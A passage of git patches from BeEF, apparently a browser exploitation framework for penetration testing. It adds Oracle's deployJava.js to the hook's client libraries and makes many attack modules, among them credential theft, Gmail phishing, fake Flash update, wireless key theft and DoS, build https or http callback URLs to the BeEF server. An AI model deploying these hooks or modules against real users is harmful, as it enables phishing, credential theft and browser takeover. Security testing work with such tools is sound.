+                log('[runApplet()] Invalid minimumVersion argument to runApplet():' +
+                    minimumVersion);
+            }
+        },
+
+
+        /**
+         * Outputs an applet tag with the specified attributes and parameters, where
+         * both attributes and parameters are associative arrays.  Each key/value
+         * pair in attributes becomes an attribute of the applet tag itself, while
+         * key/value pairs in parameters become <PARAM> tags.  No version checking
+         * or other special behaviors are performed; the tag is simply written to
+         * the page using document.writeln().
+         *
+         * As document.writeln() is generally only safe to use while the page is
+         * being rendered, you should never call this function after the page
+         * has been completed.
+         */
+        writeAppletTag: function(attributes, parameters) {
+            var startApplet = '<' + 'applet ';
+            var params = '';
+            var endApplet = '<' + '/' + 'applet' + '>';
+            var addCodeAttribute = true;
+
+            if (null == parameters || typeof parameters != 'object') {
+                parameters = new Object();
+            }
+
+            for (var attribute in attributes) {
+                if (! isValidAppletAttr(attribute)) {
+                    parameters[attribute] = attributes[attribute];
+                } else {
+                    startApplet += (' ' +attribute+ '="' +attributes[attribute] + '"');
+                    if (attribute == 'code') {
+                        addCodeAttribute = false;
+                    }
+                }
+            }
+
+            var codebaseParam = false;
+            for (var parameter in parameters) {
+                if (parameter == 'codebase_lookup') {
+                    codebaseParam = true;
+                }
+                // Originally, parameter 'object' was used for serialized
+                // applets, later, to avoid confusion with object tag in IE
+                // the 'java_object' was added.  Plugin supports both.
+                if (parameter == 'object' || parameter == 'java_object' ||
+                    parameter == 'java_code' ) {
+                    addCodeAttribute = false;
+                }
+                params += '<param name="' + parameter + '" value="' +
+                    parameters[parameter] + '"/>';
+            }
+            if (!codebaseParam) {
+                params += '<param name="codebase_lookup" value="false"/>';
+            }
+
+            if (addCodeAttribute) {
+                startApplet += (' code="dummy"');
+            }
+            startApplet += '>';
+
+            document.write(startApplet + '\n' + params + '\n' + endApplet);
+        },
+
+
+        /**
+         * Returns true if there is a matching JRE version currently installed
+         * (among those detected by getJREs()).  The versionPattern string is
+         * of the form #[.#[.#[_#]]][+|*], which includes strings such as "1.4",
+         * "1.5.0*", and "1.6.0_02+".
+         * A star (*) means "any version within this family" and a plus (+) means
+         * "any version greater or equal to the specified version".  "1.5.0*"
+         * matches 1.5.0_06 but not 1.6.0_01, whereas "1.5.0+" matches both.
+         *
+         * If the versionPattern does not include all four version components
+         * but does not end with a star or plus, it will be treated as if it
+         * ended with a star.  "1.5" is exactly equivalent to "1.5*", and will
+         * match any version number beginning with "1.5".
+         *
+         * If getJREs() is unable to detect the precise version number, a match
+         * could be ambiguous.  For example if getJREs() detects "1.5", there is
+         * no way to know whether the JRE matches "1.5.0_06+".  versionCheck()
+         * compares only as much of the version information as could be detected,
+         * so versionCheck("1.5.0_06+") would return true in in this case.
+         *
+         * Invalid versionPattern will result in a JavaScript error alert.
+         * versionPatterns which are valid but do not match any existing JRE
+         * release (e.g. "32.65+") will always return false.
+         */
+        versionCheck: function(versionPattern)
+        {
+            var index = 0;
+            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";
+
+            var matchData = versionPattern.match(regex);
+
+            if (matchData != null) {
+                // default is exact version match
+                // examples:
+                //    local machine has 1.7.0_04 only installed
+                //    exact match request is "1.7.0_05":  return false
+                //    family match request is "1.7.0*":   return true
+                //    minimum match request is "1.6+":    return true
+                var familyMatch = false;
+                var minMatch = false;
+
+                var patternArray = new Array();
+
+                for (var i = 1; i < matchData.length; ++i) {
+                    // browser dependency here.
+                    // Fx sets 'undefined', IE sets '' string for unmatched groups
+                    if ((typeof matchData[i] == 'string') && (matchData[i] != '')) {
+                        patternArray[index] = matchData[i];
+                        index++;
+                    }
+                }
+
+                if (patternArray[patternArray.length-1] == '+') {
+                    // + specified in request - doing a minimum match
+                    minMatch = true;
+                    familyMatch = false;
+                    patternArray.length--;
+                } else if (patternArray[patternArray.length-1] == '*') {
+                    // * specified in request - doing a family match
+                    minMatch = false;
+                    familyMatch = true;
+                    patternArray.length--;
+                } else if (patternArray.length < 4) {
+                    // versionPattern does not include all four version components
+                    // and does not end with a star or plus, it will be treated as
+                    // if it ended with a star. (family match)
+                    minMatch = false;
+                    familyMatch = true;
+                }
+
+                var list = this.getJREs();
+                for (var i = 0; i < list.length; ++i) {
+                    if (this.compareVersionToPattern(list[i], patternArray,
+                        familyMatch, minMatch)) {
+                        return true;
+                    }
+                }
+
+                return false;
+            } else {
+                var msg = 'Invalid versionPattern passed to versionCheck: ' +
+                    versionPattern;
+                log('[versionCheck()] ' + msg);
+                alert(msg);
+                return false;
+            }
+        },
+
+
+        /**
+         * Returns true if an installation of Java Web Start of the specified
+         * minimumVersion can be detected.  minimumVersion is optional, and
+         * if not specified, '1.4.2' will be used.
+         * (Versions earlier than 1.4.2 may not be detected.)
+         */
+        isWebStartInstalled: function(minimumVersion) {
+
+            var browser = this.getBrowser();
+            if (browser == '?') {
+                // we really don't know - better to try to use it than reinstall
+                return true;
+            }
+
+            if (minimumVersion == 'undefined' || minimumVersion == null) {
+                minimumVersion = '1.4.2';
+            }
+
+            var retval = false;
+            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+            var matchData = minimumVersion.match(regex);
+
+            if (matchData != null) {
+                retval = this.versionCheck(minimumVersion + '+');
+            } else {
+                log('[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): ' + minimumVersion);
+                retval = this.versionCheck('1.4.2+');
+            }
+            return retval;
+        },
+
+        // obtain JPI version using navigator.mimeTypes array
+        // if found, set the version to this.firefoxJavaVersion
+        getJPIVersionUsingMimeType: function() {
+            // Walk through the full list of mime types.
+            for (var i = 0; i < navigator.mimeTypes.length; ++i) {
+                var s = navigator.mimeTypes[i].type;
+                // The jpi-version is the plug-in version.  This is the best
+                // version to use.
+                var m = s.match(/^application\/x-java-applet;jpi-version=(.*)$/);
+                if (m != null) {
+                    this.firefoxJavaVersion = m[1];
+                    // Opera puts the latest sun JRE last not first
+                    if ('Opera' != this.browserName2) {
+                        break;
+                    }
+                }
+            }
+        },
+
+        // launch the specified JNLP application using the passed in jnlp file
+        // the jnlp file does not need to have a codebase
+        // this requires JRE 7 or above to work
+        // if machine has no JRE 7 or above, we will try to auto-install and then launch
+        // (function will return false if JRE auto-install failed)
+        launchWebStartApplication: function(jnlp) {
+            var uaString = navigator.userAgent.toLowerCase();
+
+            this.getJPIVersionUsingMimeType();
+
+            // make sure we are JRE 7 or above
+            if (this.isWebStartInstalled('1.7.0') == false) {
+
+                // perform latest JRE auto-install
+                if ((this.installJRE('1.7.0+') == false) ||
+                    ((this.isWebStartInstalled('1.7.0') == false))) {
+                    return false;
+                }
+            }
+
+            var jnlpDocbase = null;
+
+            // use document.documentURI for docbase
+            if (document.documentURI) {
+                jnlpDocbase = document.documentURI;
+            }
+
+            // fallback to document.URL if documentURI not available
+            if (jnlpDocbase == null) {
+                jnlpDocbase = document.URL;
+            }
+
+            var browser = this.getBrowser();
+
+            var launchTag;
+
+            if (browser == 'MSIE') {
+
+                launchTag = '<' +
+                    'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
+                    'width="0" height="0">' +
+                    '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
+                    '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
+                    '<' + '/' + 'object' + '>';
+            } else if (browser == 'Netscape Family') {
+
+                launchTag = '<' +
+                    'embed type="application/x-java-applet;jpi-version=' +
+                    this.firefoxJavaVersion + '" ' +
+                    'width="0" height="0" ' +
+                    'launchjnlp="' +  jnlp + '"' +
+                    'docbase="' +  jnlpDocbase + '"' +
+                    ' />';
+            }
+
+            if (document.body == 'undefined' || document.body == null) {
+                document.write(launchTag);
+                // go back to original page, otherwise current page becomes blank
+                document.location = jnlpDocbase;
+            } else {
+                var divTag = document.createElement("div");
+                divTag.id = "div1";
+                divTag.style.position = "relative";
+                divTag.style.left = "-10000px";
+                divTag.style.margin = "0px auto";
+                divTag.className ="dynamicDiv";
+                divTag.innerHTML = launchTag;
+                document.body.appendChild(divTag);
+            }
+        },
+
+        createWebStartLaunchButtonEx: function(jnlp, minimumVersion) {
+
+            if (this.returnPage == null) {
+                // if there is an install, come back and run the jnlp file
+                this.returnPage = jnlp;
+            }
+
+            var url = 'javascript:deployJava.launchWebStartApplication(\'' + jnlp +
+                '\');';
+
+            document.write('<' + 'a href="' + url +
+                '" onMouseOver="window.status=\'\'; ' +
+                'return true;"><' + 'img ' +
+                'src="' + this.launchButtonPNG + '" ' +
+                'border="0" /><' + '/' + 'a' + '>');
+        },
+
+
+        /**
+         * Outputs a launch button for the specified JNLP URL.  When clicked, the
+         * button will ensure that an appropriate JRE is installed and then launch
+         * the JNLP application.  minimumVersion is of the form #[.#[.#[_#]]], and
+         * is the minimum JRE version necessary to run this JNLP application.
+         * minimumVersion is optional, and if it is not specified, '1.4.2'
+         * will be used.
+         * If an appropriate JRE or Web Start installation is detected,
+         * the JNLP application will be launched, otherwise installLatestJRE()
+         * will be called.
+         *
+         * After installLatestJRE() is called, the script will attempt to detect
+         * that the JRE installation has completed and launch the JNLP application,
+         * but there are circumstances (such as when the JRE installation
+         * requires a browser restart) when this cannot be fulfilled.
+         */
+        createWebStartLaunchButton: function(jnlp, minimumVersion) {
+
+            if (this.returnPage == null) {
+                // if there is an install, come back and run the jnlp file
+                this.returnPage = jnlp;
+            }
+
+            var url = 'javascript:' +
+                'if (!deployJava.isWebStartInstalled(&quot;' +
+                minimumVersion + '&quot;)) {' +
+                'if (deployJava.installLatestJRE()) {' +
+                'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
+                '}' +
+                '} else {' +
+                'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
+                '}';
+
+            document.write('<' + 'a href="' + url +
+                '" onMouseOver="window.status=\'\'; ' +
+                'return true;"><' + 'img ' +
+                'src="' + this.launchButtonPNG + '" ' +
+                'border="0" /><' + '/' + 'a' + '>');
+        },
+
+
+        /**
+         * Launch a JNLP application, (using the plugin if available)
+         */
+        launch: function(jnlp) {
+            /*
+             * Using the plugin to launch Java Web Start is disabled for the time being
+             */
+            document.location=jnlp;
+            return true;
+        },
+
+
+        /*
+         * returns true if the ActiveX or XPI plugin is installed
+         */
+        isPluginInstalled: function() {
+            var plugin = this.getPlugin();
+            if (plugin && plugin.jvms) {
+                return true;
+            } else {
+                return false;
+            }
+        },
+
+        /*
+         * returns true if the plugin is installed and AutoUpdate is enabled
+         */
+        isAutoUpdateEnabled: function() {
+            if (this.isPluginInstalled()) {
+                return this.getPlugin().isAutoUpdateEnabled();
+            }
+            return false;
+        },
+
+        /*
+         * sets AutoUpdate on if plugin is installed
+         */
+        setAutoUpdateEnabled: function() {
+            if (this.isPluginInstalled()) {
+                return this.getPlugin().setAutoUpdateEnabled();
+            }
+            return false;
+        },
+
+        /*
+         * sets the preferred install type : null, online, kernel
+         */
+        setInstallerType: function(type) {
+            this.installType = type;
+            if (this.isPluginInstalled()) {
+                return this.getPlugin().setInstallerType(type);
+            }
+            return false;
+        },
+
+        /*
+         * sets additional package list - to be used by kernel installer
+         */
+        setAdditionalPackages: function(packageList) {
+            if (this.isPluginInstalled()) {
+                return this.getPlugin().setAdditionalPackages(
+                    packageList);
+            }
+            return false;
+        },
+
+        /*
+         * sets preference to install Early Access versions if available
+         */
+        setEarlyAccess: function(enabled) {
+            this.EAInstallEnabled = enabled;
+        },
+
+        /*
+         * Determines if the next generation plugin (Plugin II) is default
+         */
+        isPlugin2: function() {
+            if (this.isPluginInstalled()) {
+                if (this.versionCheck('1.6.0_10+')) {
+                    try {
+                        return this.getPlugin().isPlugin2();
+                    } catch (err) {
+                        // older plugin w/o isPlugin2() function -
+                    }
+                }
+            }
+            return false;
+        },
+
+        //support native DT plugin?
+        allowPlugin: function() {
+            this.getBrowser();
+
+            // Safari and Opera browsers find the plugin but it
+            // doesn't work, so until we can get it to work - don't use it.
+            var ret = ('Safari' != this.browserName2 &&
+                'Opera' != this.browserName2);
+
+            return ret;
+        },
+
+        getPlugin: function() {
+            this.refresh();
+
+            var ret = null;
+            if (this.allowPlugin()) {
+                ret = document.getElementById('deployJavaPlugin');
+            }
+            return ret;
+        },
+
+        compareVersionToPattern: function(version, patternArray,
+                                          familyMatch, minMatch) {
+            if (version == undefined || patternArray == undefined) {
+                return false;
+            }
+            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
+            var matchData = version.match(regex);
+
+            if (matchData != null) {
+                var index = 0;
+                var result = new Array();
+
+                for (var i = 1; i < matchData.length; ++i) {
+                    if ((typeof matchData[i] == 'string') && (matchData[i] != ''))
+                    {
+                        result[index] = matchData[i];
+                        index++;
+                    }
+                }
+
+                var l = Math.min(result.length, patternArray.length);
+
+                // result contains what is installed in local machine
+                // patternArray is what is being requested by application
+                if (minMatch) {
+                    // minimum version match, return true if what we have (installed)
+                    // is greater or equal to what is requested.  false otherwise.
+                    for (var i = 0; i < l; ++i) {
+                        if (result[i] < patternArray[i]) {
+                            return false;
+                        } else if (result[i] > patternArray[i]) {
+                            return true;
+                        }
+                    }
+                    return true;
+                } else {
+                    for (var i = 0; i < l; ++i) {
+                        if (result[i] != patternArray[i]) return false;
+                    }
+                    if (familyMatch) {
+                        // family match - return true as long as what we have
+                        // (installed) matches up to the request pattern
+                        return true;
+                    } else {
+                        // exact match
+                        // result and patternArray needs to have exact same content
+                        return (result.length == patternArray.length);
+                    }
+                }
+            } else {
+                return false;
+            }
+        },
+
+        getBrowser: function() {
+
+            if (this.browserName == null) {
+                var browser = navigator.userAgent.toLowerCase();
+
+                log('[getBrowser()] navigator.userAgent.toLowerCase() -> ' + browser);
+
+
+                // order is important here.  Safari userAgent contains mozilla,
+                // and Chrome userAgent contains both mozilla and safari.
+                if ((browser.indexOf('msie') != -1) && (browser.indexOf('opera') == -1)) {
+                    this.browserName = 'MSIE';
+                    this.browserName2 = 'MSIE';
+                } else if (browser.indexOf('iphone') != -1) {
+                    // this included both iPhone and iPad
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'iPhone';
+                } else if ((browser.indexOf('firefox') != -1) && (browser.indexOf('opera') == -1)) {
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'Firefox';
+                } else if (browser.indexOf('chrome') != -1) {
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'Chrome';
+                } else if (browser.indexOf('safari') != -1) {
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'Safari';
+                } else if ((browser.indexOf('mozilla') != -1) && (browser.indexOf('opera') == -1)) {
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'Other';
+                } else if (browser.indexOf('opera') != -1) {
+                    this.browserName = 'Netscape Family';
+                    this.browserName2 = 'Opera';
+                } else {
+                    this.browserName = '?';
+                    this.browserName2 = 'unknown';
+                }
+
+                log('[getBrowser()] Detected browser name:'+ this.browserName +
+                    ', ' + this.browserName2);
+            }
+            return this.browserName;
+        },
+
+
+        testUsingActiveX: function(version) {
+            var objectName = 'JavaWebStart.isInstalled.' + version + '.0';
+
+            // we need the typeof check here for this to run on FF/Chrome
+            // the check needs to be in place here - cannot even pass ActiveXObject
+            // as arg to another function
+            if (typeof ActiveXObject == 'undefined' || !ActiveXObject) {
+                log('[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?');
+                return false;
+            }
+
+            try {
+                return (new ActiveXObject(objectName) != null);
+            } catch (exception) {
+                return false;
+            }
+        },
+
+
+        testForMSVM: function() {
+            var clsid = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
+
+            if (typeof oClientCaps != 'undefined') {
+                var v = oClientCaps.getComponentVersion(clsid, "ComponentID");
+                if ((v == '') || (v == '5,0,5000,0')) {
+                    return false;
+                } else {
+                    return true;
+                }
+            } else {
+                return false;
+            }
+        },
+
+
+        testUsingMimeTypes: function(version) {
+            if (!navigator.mimeTypes) {
+                log ('[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?');
+                return false;
+            }
+
+            for (var i = 0; i < navigator.mimeTypes.length; ++i) {
+                s = navigator.mimeTypes[i].type;
+                var m = s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);
+                if (m != null) {
+                    if (this.compareVersions(m[1], version)) {
+                        return true;
+                    }
+                }
+            }
+            return false;
+        },
+
+        testUsingPluginsArray: function(version) {
+            if ((!navigator.plugins) || (!navigator.plugins.length)) {
+                return false;
+            }
+            var platform = navigator.platform.toLowerCase();
+
+            for (var i = 0; i < navigator.plugins.length; ++i) {
+                s = navigator.plugins[i].description;
+                if (s.search(/^Java Switchable Plug-in (Cocoa)/) != -1) {
+                    // Safari on MAC
+                    if (this.compareVersions("1.5.0", version)) {
+                        return true;
+                    }
+                } else if (s.search(/^Java/) != -1) {
+                    if (platform.indexOf('win') != -1) {
+                        // still can't tell - opera, safari on windows
+                        // return true for 1.5.0 and 1.6.0
+                        if (this.compareVersions("1.5.0", version) ||
+                            this.compareVersions("1.6.0", version)) {
+                            return true;
+                        }
+                    }
+                }
+            }
+            // if above dosn't work on Apple or Windows, just allow 1.5.0
+            if (this.compareVersions("1.5.0", version)) {
+                return true;
+            }
+            return false;
+
+
+
+        },
+
+        IEInstall: function() {
+
+            location.href = constructGetJavaURL(
+                ((this.returnPage != null) ?
+                    ('&returnPage=' + this.returnPage) : '') +
+                    ((this.locale != null) ?
+                        ('&locale=' + this.locale) : '') +
+                    ((this.brand != null) ? ('&brand=' + this.brand) : ''));
+
+            // should not actually get here
+            return false;
+        },
+
+        done: function (name, result) {
+        },
+
+        FFInstall: function() {
+
+            location.href = constructGetJavaURL(
+                ((this.returnPage != null) ?
+                    ('&returnPage=' + this.returnPage) : '') +
+                    ((this.locale != null) ?
+                        ('&locale=' + this.locale) : '') +
+                    ((this.brand != null) ? ('&brand=' + this.brand) : '') +
+                    ((this.installType != null) ?
+                        ('&type=' + this.installType) : ''));
+
+            // should not actually get here
+            return false;
+        },
+
+        // return true if 'installed' (considered as a JRE version string) is
+        // greater than or equal to 'required' (again, a JRE version string).
+        compareVersions: function(installed, required) {
+
+            var a = installed.split('.');
+            var b = required.split('.');
+
+            for (var i = 0; i < a.length; ++i) {
+                a[i] = Number(a[i]);
+            }
+            for (var i = 0; i < b.length; ++i) {
+                b[i] = Number(b[i]);
+            }
+            if (a.length == 2) {
+                a[2] = 0;
+            }
+
+            if (a[0] > b[0]) return true;
+            if (a[0] < b[0]) return false;
+
+            if (a[1] > b[1]) return true;
+            if (a[1] < b[1]) return false;
+
+            if (a[2] > b[2]) return true;
+            if (a[2] < b[2]) return false;
+
+            return true;
+        },
+
+        enableAlerts: function() {
+            // reset this so we can show the browser detection
+            this.browserName = null;
+            this.debug = true;
+        },
+
+        poll: function() {
+
+            this.refresh();
+            var postInstallJREList = this.getJREs();
+
+            if ((this.preInstallJREList.length == 0) &&
+                (postInstallJREList.length != 0)) {
+                clearInterval(this.myInterval);
+                if (this.returnPage != null) {
+                    location.href = this.returnPage;
+                };
+            }
+
+            if ((this.preInstallJREList.length != 0) &&
+                (postInstallJREList.length != 0) &&
+                (this.preInstallJREList[0] != postInstallJREList[0])) {
+                clearInterval(this.myInterval);
+                if (this.returnPage != null) {
+                    location.href = this.returnPage;
+                }
+            }
+
+        },
+
+        writePluginTag: function() {
+            var browser = this.getBrowser();
+
+            if (browser == 'MSIE') {
+                document.write('<' +
+                    'object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" ' +
+                    'id="deployJavaPlugin" width="0" height="0">' +
+                    '<' + '/' + 'object' + '>');
+            } else if (browser == 'Netscape Family' && this.allowPlugin()) {
+                this.writeEmbedTag();
+            }
+        },
+
+        refresh: function() {
+            navigator.plugins.refresh(false);
+
+            var browser = this.getBrowser();
+            if (browser == 'Netscape Family' && this.allowPlugin()) {
+                var plugin = document.getElementById('deployJavaPlugin');
+                // only do this again if no plugin
+                if (plugin == null) {
+                    this.writeEmbedTag();
+                }
+            }
+        },
+
+        writeEmbedTag: function() {
+            var written = false;
+            if (navigator.mimeTypes != null) {
+                for (var i=0; i < navigator.mimeTypes.length; i++) {
+                    if (navigator.mimeTypes[i].type == this.mimeType) {
+                        if (navigator.mimeTypes[i].enabledPlugin) {
+                            document.write('<' +
+                                'embed id="deployJavaPlugin" type="' +
+                                this.mimeType + '" hidden="true" />');
+                            written = true;
+                        }
+                    }
+                }
+                // if we ddn't find new mimeType, look for old mimeType
+                if (!written) for (var i=0; i < navigator.mimeTypes.length; i++) {
+                    if (navigator.mimeTypes[i].type == this.oldMimeType) {
+                        if (navigator.mimeTypes[i].enabledPlugin) {
+                            document.write('<' +
+                                'embed id="deployJavaPlugin" type="' +
+                                this.oldMimeType + '" hidden="true" />');
+                        }
+                    }
+                }
+            }
+        }
+    }; // deployJava object
+
+    rv.writePluginTag();
+    if (rv.locale == null) {
+        var loc = null;
+
+        if (loc == null) try {
+            loc = navigator.userLanguage;
+        } catch (err) { }
+
+        if (loc == null) try {
+            loc = navigator.systemLanguage;
+        } catch (err) { }
+
+        if (loc == null) try {
+            loc = navigator.language;
+        } catch (err) { }
+
+        if (loc != null) {
+            loc.replace("-","_")
+            rv.locale = loc;
+        }
+    }
+
+    return rv;
+}();
\ No newline at end of file
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 2bb2dfeec..a9045b4f3 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js lib/deployJava.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)

From c6314f97cb062841802f330c34431ae2765414a2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 4 Aug 2013 16:45:24 +0930
Subject: [PATCH 356/397] Update version to beef-0.4.4.7-alpha

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 11ac0da8e..e4521c4f2 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.7-alpha
+0.4.4.8-alpha
diff --git a/config.yaml b/config.yaml
index a70f427f2..2c2304b5d 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.7-alpha'
+    version: '0.4.4.8-alpha'
     debug: false
 
     restrictions:

From ca8f5d37e1501d0cb9cba3f4eb6a78fd87010bfa Mon Sep 17 00:00:00 2001
From: Finn Herzfeld <thefinn93@thefinn93.com>
Date: Tue, 6 Aug 2013 17:03:17 -0700
Subject: [PATCH 357/397] Corrected minor typo

---
 config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/config.yaml b/config.yaml
index 2c2304b5d..adc8e98dc 100644
--- a/config.yaml
+++ b/config.yaml
@@ -44,7 +44,7 @@ beef:
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          secure: true # use WebSocketSecure work only on https domain and with https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second

From 21417dc3e2dc8d0140fc84278214284406a8443b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 9 Aug 2013 13:21:33 +0930
Subject: [PATCH 358/397] Update BeEF server protocol for multiple modules to
 use `beef.http.https.enable`

Now uses the `beef.net.httpproto` value rather than a hard-coded
protocol string.

Part of issue #745
---
 .../hooked_domain/deface_web_page/module.rb    |  3 ++-
 .../get_stored_credentials/module.rb           |  3 ++-
 .../site_redirect_iframe/module.rb             |  3 ++-
 modules/browser/play_sound/module.rb           |  3 ++-
 modules/browser/webcam/command.js              |  4 ++--
 .../browser/webcam_permission_check/command.js |  4 ++--
 .../chrome_extensions/inject_beef/command.js   |  2 +-
 modules/debug/test_http_bind_raw/module.rb     |  3 ++-
 .../beef_bind_staged_deploy/command.js         |  3 ++-
 .../local_host/java_payload/command.js         |  2 +-
 modules/exploits/m0n0wall/command.js           |  2 +-
 modules/exploits/sqlitemanager_xss/module.rb   |  3 ++-
 .../xss/alienvault_ossim_3.1_xss/module.rb     |  3 ++-
 .../cisco_collaboration_server_5_xss/module.rb |  3 ++-
 .../exploits/xss/serendipity_1.6_xss/module.rb |  3 ++-
 modules/host/get_internal_ip/command.js        |  2 +-
 modules/host/get_physical_location/command.js  |  2 +-
 modules/host/get_system_info/command.js        |  2 +-
 .../host/get_system_info/getSystemInfo.java    |  2 +-
 modules/host/get_wireless_keys/command.js      |  2 +-
 modules/host/hook_default_browser/command.js   |  2 +-
 modules/host/hook_default_browser/module.rb    | 10 ++++++----
 modules/misc/iframe_sniffer/command.js         |  2 +-
 modules/network/DOSer/command.js               | 18 +++++++++---------
 modules/network/ping_sweep_java/command.js     |  2 +-
 modules/persistence/popunder_window/command.js |  2 +-
 .../phonegap/phonegap_persistence/module.rb    |  3 ++-
 .../social_engineering/clickjacking/module.rb  |  3 ++-
 .../fake_flash_update/module.rb                |  5 +++--
 .../fake_notification_ff/module.rb             |  3 ++-
 .../gmail_phishing/module.rb                   |  4 ++--
 .../social_engineering/pretty_theft/module.rb  |  3 ++-
 .../replace_video_fake_plugin/module.rb        |  3 ++-
 .../social_engineering/tabnabbing/module.rb    |  3 ++-
 34 files changed, 68 insertions(+), 49 deletions(-)

diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb
index 2965cb776..2ac01f37d 100644
--- a/modules/browser/hooked_domain/deface_web_page/module.rb
+++ b/modules/browser/hooked_domain/deface_web_page/module.rb
@@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command
 
   def self.options
 	configuration = BeEF::Core::Configuration.instance
-	favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+	favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
     return [
 		{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
 		{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb
index 093ca44aa..6effcc26c 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/module.rb
+++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb
@@ -7,7 +7,8 @@ class Get_stored_credentials < BeEF::Core::Command
 
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
 		return [
 			{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
 		]
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
index 813dc802a..6bfe3298f 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb
+++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
@@ -7,7 +7,8 @@ class Site_redirect_iframe < BeEF::Core::Command
   
     def self.options
 		configuration = BeEF::Core::Configuration.instance
-		favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
         return [
 			  { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
 			  { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb
index 9c4eb75a3..e8166c33c 100644
--- a/modules/browser/play_sound/module.rb
+++ b/modules/browser/play_sound/module.rb
@@ -9,8 +9,9 @@ class Play_sound < BeEF::Core::Command
   def self.options
 
     configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
 
-    sound_file_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
